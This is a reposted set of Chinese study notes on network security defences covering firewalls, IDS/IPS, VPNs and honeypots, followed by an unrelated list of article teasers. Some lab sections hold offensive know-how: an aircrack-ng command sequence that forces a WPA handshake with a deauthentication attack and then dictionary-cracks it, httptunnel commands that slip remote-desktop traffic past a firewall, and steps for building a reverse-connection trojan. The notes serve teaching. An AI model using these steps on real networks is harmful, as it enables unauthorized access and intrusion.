3.信息安全之预防黑客攻击手段

1.防火墙技术(建筑术语和消防术语)

  1. 设置一个大门,以防其他数据在其他地方进入(隔绝有害数据,是设备,开一个大门审核数据合法性 ,其他地方隔绝进入,防外网数据,绕开防火墙和内部攻击不管)保证数据完整性)
  2. 原理 作用
    1.保护容易攻击的服务
    2.保护特殊站点(敏感信息)服务
    3.过滤非法用户,网络访问记录和统计(警察找犯人,有线索)
  3. 防火墙分类 软件防火墙,硬件…,主机…,网络…,wins…,linux…
    技术上分类:
    1. 包过滤(检测数据包的传输层和网络层ip和目标ip)
    2. nat 代理(应用层)
    3. 监测(应用层 传输层 网络层 三层)
  4. 规则配置(规则有先后次序)
  5. 实验 天网防火墙软件 有端口规则 ip限制ping 还有日志
    不让其他机器访问我的网站 建立规则(软件可以移动规则到上面)

2.入侵检测(内部入侵,让防火墙防御,不能清除已经感染的病毒)

  1. 入侵检测 IDS intrusion detection sys
    1. (检测判断阻断ip端口时间间隔 外网攻击,非法信息记录日志动态配置防火墙规则)
      (软件+硬件)实时保护
    2. 作用: 识别攻击手段,监控网络异常通讯(突然网络数据与之前数据不一样[大数据统计正常行为])
    3. 完善安全管理
      分类:
      1]基于主机HIDS,检查分析系统是否被攻击,然后报警
      2] NIDS网络的, 混杂模式,经过我的(与所有网络共享)数据包,进行检查 ,放在路由后
      问题: 1.误报率高 2.没有主动防御功能 秘书的例子…
  2. IPS/IDP intrution prevention sys(ids和防火墙结合 有防御功能,立即响应切断连接) 多过滤器, 恶意包丢弃,怀疑的包放隔离区 360是IPS
    特征: 嵌入式运行(在路由后) 深入分析和控制 特征库 高性能

3.入侵防御技术

  1. 集中式(使用网桥[一个网络连接另外一个网络]公网连接内网检查ip是否运行)
  2. 分布式(多个ips[相互备份,混杂无ip,非混杂有ip]通知他的客户端来抗阻 黑客,有 一个center记录信息发送报警信息)

4.病毒和木马的区别

  1. 病毒(分为蠕虫[独立运行,自动通过网络复制到网络传播])有自我复制传染性,潜伏期 附加在各种文件(半可执行)(可触发)(针对性 特定的计算机和操作系统)
  2. 特洛伊木马(木马),古罗马打仗 特洛伊撤兵,放木马里面有20人潜伏让敌人打开城门带入里面,藏在程序里面,伪装很好,和系统文件名字一样.(不传染)(隐蔽性)(企业管理工具)
  3. 反向(被攻击机主动连接攻击木马机)连接木马实验,飞鸽子软件
    配置服务程序—>本地ip
    安装选项—>提示成功关闭 打开删除安装文件 生成了server.exe就是木马

5.vpn连接两个局部网络, virtural private network 虚拟专有网络

  1. 定义 穿过公用网络建立临时的,安全的连接
    (局域网)—加密–>公网----解密—>(局域网)

  2. 分类 PPTP(最简单的) IPSEC L2TP(最安全的)

  3. 功能 加密数据, 身份验证,范围控制,地址分配,更新秘钥

  4. 优点 费用低(不用公网ip了) 支持常用的协议 ip地址安全(发请求,可以看到公网ip,但不能看到具体发送到的网络地址)
    nat转换 ,把局域网转公网
    dhcp 动态网络地址分配
    dns 谷歌8.8.8.8 国内114.114.114.114

  5. 实验
    winserver2003 管理工具—>路由和远程范围创建和 配置和启动
    —>dhcp中继
    xp网络连接.创建连接 工作场所,虚拟网络 ip地址是vpn win2003的地址 输入2003的密码 菜单管理工具–>计算机管理—>本地用户和组右击administrator右击属性接入 -->允许访问

6.httptunnel技术(类似vpn)和蜜罐honeypot技术(有意设置一个靶机,试探敌方攻击方式,log下来,用来被攻陷的)主动防御 证据用于法律起诉

  1. 蜜罐 产品型(实战,) 研究型(研究新攻击手段)
    把 su 改为 su xxx,将黑客(使用 su)引入蜜罐
  2. 实验 80端口一定是开放的在http网站中,其他端口不开放,可是我想要连接远程桌面怎么办(3389)?
    httptunnel 通过工具在本地转换为远程桌面端口,访问
    A–3389端口(伪装)–80端口–firewall–80端口(默认打开)----访问3389端口–>B(被攻击)
    server: hts -F localhost:3389 #开放http80端口
    client: htc -F 6789 192.168.10.1:80 #把访问127.0.0.1转换为 服务器的80端口

7.破解wifi纯密码(字典) kali aircrack-ng抓取加密数据包和字典加密密文 对比得出原密码

 #挂载usb无线网卡 设置-->关闭所有启用网络连接,增加usb
    #kali 查看网卡
       airmon-ng
    #激活网卡,接收wifi信号
       airmon-ng start wlan0 #wlan0是网卡名字
       iwconfig #查在监听的网卡名
        #扫描wifi信号 PWR信号强度(小就强) CH频道号 AUTH加密方式,ESSID wifi名字
       airodump-ng wlan0mon 
       #手机连接wifi
    #抓包
    airodump-ng --bssid   9C:XXXX -c 11 -w WIFI wlan0mon  #写bassid和频道11放到WIFI这个文件
   #开了另外kali窗口攻击到抓包窗口出现WPA handshake
        airplay-ng -0 1 -a xxx攻击手机的mac -c xxxwifimac  -0 1 #攻击一次
   #破解上面语句生成的文件 WIFI*.cap
        aircrack-ng-w dict.txt WIFI*.cap #dict.txt是破解的字典

8.数据库系统安全技术(断电,…导致数据丢失,输入后就被获取,存入后没有意义)

  1. 账号设置和密码弱(用默认的…)
  2. 缺乏角色分离(数据库管理员使用的权限大,没有分职责的角色,权限要细分)
  3. 缺乏审计跟踪(日志被关闭,为了省空间和性能)
  4. 未利用数据库安全特征(只有客户端的安全,忽略直接用jdbc连接的安全问题)

9.怎么保证数据库安全?

  1. 保证数据库完整性(物理[机器],逻辑[操作上,操作一个字段不影响整个表,直接删除掉…])
  2. 保密性 权限控制 用户认证 审计跟踪(log) 数据加密
  3. 数据备份
    无聊看的文章…https://www.cnblogs.com/Alickx/p/15318106.html

10.SQLmap进行sql注入(自动)支持多种数据库)

#kali增加火狐插件 add-ons -->temper data 得到cookie 打开sql注入功能

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/25383.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

模仿抖音直播商城带货打赏功能做一个app系统

随着人们生活和互联网的高度整合,越来越多的人开始转变自身消费模式,从实体店购物逐渐转向足不出户即可享受购物快感的网上购物。许多企业看到了电子商务背后隐藏的巨大价值,想要寻找合适的开发商建立属于自己的电商直播系统,那么…

2021-06-10 51单片机,键控流水灯——中断方式

缘由https://ask.csdn.net/questions/7444779?spm1005.2025.3001.5141 #include "reg52.h" sbit K1 P1^5; sbit K2 P1^6; sbit K3 P1^7; bit kk0; void zdsz() {EAEX0IT01; } void main() {unsigned char Xd0;unsigned int ys4747,d10;zdsz();while(1){if(!ys)…

CodeForces..学习读书吧.[简单].[条件判断].[找最小值]

题目描述: 题目解读: 给定一组数,分别是 “时间 内容”,内容分为00,01,10,11四种,求能够得到11的最小时间。 解题思路: 看似00,01,10&#xff0…

C语言中的类型转换

C语言中的类型转换 隐式类型转换 整型提升 概念: C语言的整型算术运算总是至少以缺省(默认)整型类型的精度来进行的为了获得这个精度,表达式中字符和短整型操作数在使用之前被转换为普通整型,这种转换成为整型提升 如…

自学大语言模型之BERT

BERT 模型由 Jacob Devlin、Ming-Wei Chang、Kenton Lee 和 Kristina Toutanova在BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding中提出。它是一种双向变换器,使用掩码语言建模目标和对包含多伦多图书语料库和维基百科的大型语…

C语言---初始C语言

1、初始C语言 1、编译器主要有:Clang、GCC、WIN-TC、MSVC、Turbo C等 什么是编译? test.c----------------------------->test.exe 这个过程需要经过编译、链接等过程,而众多编译器实现的功能就是把我们写的test.c进行编译。 2、VS20…

利用栈和队列共同解决迷宫问题

文章目录 什么是迷宫问题?如何解决迷宫问题?DFS(深度优先搜索)BFS(广度优先搜索) 总结 什么是迷宫问题? 迷宫问题是一道经典的算法问题,旨在寻找一条从起点到终点的最短路径。通常迷…

桶排序 — 计数排序和基数排序

计数排序 int类型数组,其中存的是员工的年龄。比如说16 - 150。对于这样的数据来讲,数据状况是受限的。此时如果将数组从小到大进行排序,该如果实现? 这个实现很简单,实现一个统计数组范围从 0 ~ 150,新数组…

Flume的安装和使用

安装Flume 1.1访问Flume的官网(http://flume.apache.org/download.html),下载Flume安装apache-flume-1.9.0-bin.tar.gz。或者下载我的百度网盘资源。把安装文件解压缩到windows操作“D:\”目录下,然后执行如下命令测试是否安装成…

【JavaSE】Java基础语法(十六):抽象类

文章目录 1. 抽象类的概述2. 抽象类的特点3. 抽象类的实用价值4. 抽象类的案例 1. 抽象类的概述 当我们在做子类共性功能抽取时,有些方法在父类中并没有具体的体现,这个时候就需要抽象类了! 在Java中,一个没有方法体的方法应该定义…

在Linux设备上让程序在任意目录都能执行

目录 0. 前言1. 编写代码2. 创建软链接3. 其他Linux文章 0. 前言 在Ubuntu上使用espidf中往往需要先设置环境变量,再执行export.sh,对环境装的乱七八糟的我造成了很大的不便我希望无论我在哪个目录,都能快速执行某个命令 我先是使用了编写b…

微信小程序开发实战 ⑨(TabBar)

作者 : SYFStrive 博客首页 : HomePage 📜: 微信小程序 📌:个人社区(欢迎大佬们加入) 👉:社区链接🔗 📌:觉得文章不错可以点点关注 &#x1f4…

【Unittest】自动化测试框架核心要素

1、什么是Unittest框架? python自带一种单元测试框架 2、为什么使用UnitTest框架? >批量执行用例 >提供丰富的断言知识 >可以生成报告 3、核心要素: 1). TestCase(测试用例) 2). TestSuite(测试套件)…

WalkRE--刷图流程(超具体)

1、打开WalkRE软件,界面如下: 2、选择“根据模板新建工程”。操作如下: 3、导入数据。需要准备好dxf格式的CAD地形数据。操作如下: 在空白处右键,先关闭所有层(大部分层在刷图时用不上,仅打开刷…

如何监控电动车充电桩能耗?

一 背景 随着新能源汽车的快速发展,像特斯拉、BYD、蔚来、小鹏和理想等品牌的电动汽车在我们的日常生活中越来越多了,可见电动汽车如今已逐渐被我们所认可了。同汽油车需要加油一样,电动汽车需要充电,如此一来,电动汽…

C++进阶 —— multimap

目录 一&#xff0c;multimap介绍 类pair 函数模板make_pair 二&#xff0c;multimap使用 一&#xff0c;multimap介绍 multimap是关联式容器&#xff0c;按照特定顺序存储键值对<key、value>&#xff0c;其中多个键值对之间的key可以重复&#xff1b;键key通常用于排…

供应链 | 在线平台的研究与思考(一):销售渠道与模式选择

封面图来源&#xff1a; https://www.pexels.com/zh-cn/photo/4968391/ 编者按 当前&#xff0c;电商平台主要采用两种销售模式&#xff1a;代理和分销。商家根据自身情况选择线上或线下渠道&#xff0c;而电商平台会根据不同的线上商家选择适当的分销模式。本期编者精选的两…

C++环形缓冲区设计与实现:从原理到应用的全方位解析

C环形缓冲区设计与实现&#xff1a;从原理到应用的全方位解析 一、环形缓冲区基础理论解析&#xff08;Basic Theory of Circular Buffer&#xff09;1.1 环形缓冲区的定义与作用&#xff08;Definition and Function of Circular Buffer&#xff09;1.2 环形缓冲区的基本原理&…

Smartbi“三步走”构建智慧经营分析平台,实现国有企业监管报送和数智化转型

01. 现状与痛点 — 一直以来&#xff0c;国资国企都是促进我国经济高速发展的领头羊&#xff0c;但近年来受疫情冲击和国际经济下行影响&#xff0c;国资企业经营面临较大压力&#xff0c;同时为实现国有企业高质量发展&#xff0c;国务院国资委下发一系列政策要求&#xff…

linuxOPS基础_vmware虚拟机安装及介绍

虚拟机概念 什么是虚拟机&#xff1f; 虚拟机&#xff0c;有些时候想模拟出一个真实的电脑环境&#xff0c;碍于使用真机安装代价太大&#xff0c;因此而诞生的一款可以模拟操作系统运行的软件。 虚拟机目前有2 个比较有名的产品&#xff1a;vmware 出品的vmware workstatio…